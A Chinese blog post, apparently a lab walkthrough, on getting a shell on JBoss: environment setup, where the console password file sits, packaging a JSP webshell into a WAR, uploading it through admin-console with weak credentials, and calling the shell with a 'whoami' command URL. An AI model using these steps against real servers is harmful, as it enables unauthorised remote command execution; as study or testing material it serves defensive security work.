Jboss getshell - 走看看

zoukankan html css js c++ java

Jboss getshell

Jboss 的安装需要 JDK 环境

JDK+JBOSS 包

初始环境配置

系统变量名变量值

PATH %JAVA_HOME%in；%JAVA_HOME%jrein

JAVA_HOME C:Program Files (x86)Javajdk1.6.0_43

CLASSPATH .;%JAVA_HOME%/lib/dt.jar;%JAVA_HOME%/lib/tools.jar

JBOSS_HOME C:WWW

JBOSS 密码

linux 下

/usr/java/jboss/server/default/conf/props

jmx-console-users.properties 密码

windows

serverstandardconfprops

jmx-console-users.properties

制作war包 shell

上传war包会自动解压war包内的文件。

比如上传 xx.war 直接访问 xx/webshell.jsp

jar cvf filename.war webshell.jsp

0x01利用弱密码进行getshell

admin-console

需要存在该页面

URL：http://127.0.0.1:8080/admin-console/secure/summary.seam?path=-3%2FApplications%2FWeb+Application+%28WAR%29&conversationId=43&conversationPropagation=end

点击 continue 上传

直接访问根目录 http://x.x.x.x/warname/shellname.jsp

http://127.0.0.1:8080/echod2018/echod.jsp?pwd=023&i=whoami

--------------------------------------------------------------------------------------------

查看全文

相关阅读:
页面渲染1——创建对象模型
 HTTP 缓存
 web安全字体
 图片优化
 基于文本内容的压缩
 Mac homebrew的熟悉和常用指令
 二、Java注释
 一、Java环境变量配置
 JS中的逻辑运算符&&、||
js 中的深拷贝与浅拷贝

原文地址：https://www.cnblogs.com/echod/p/9006863.html

Copyright © 2011-2022 走看看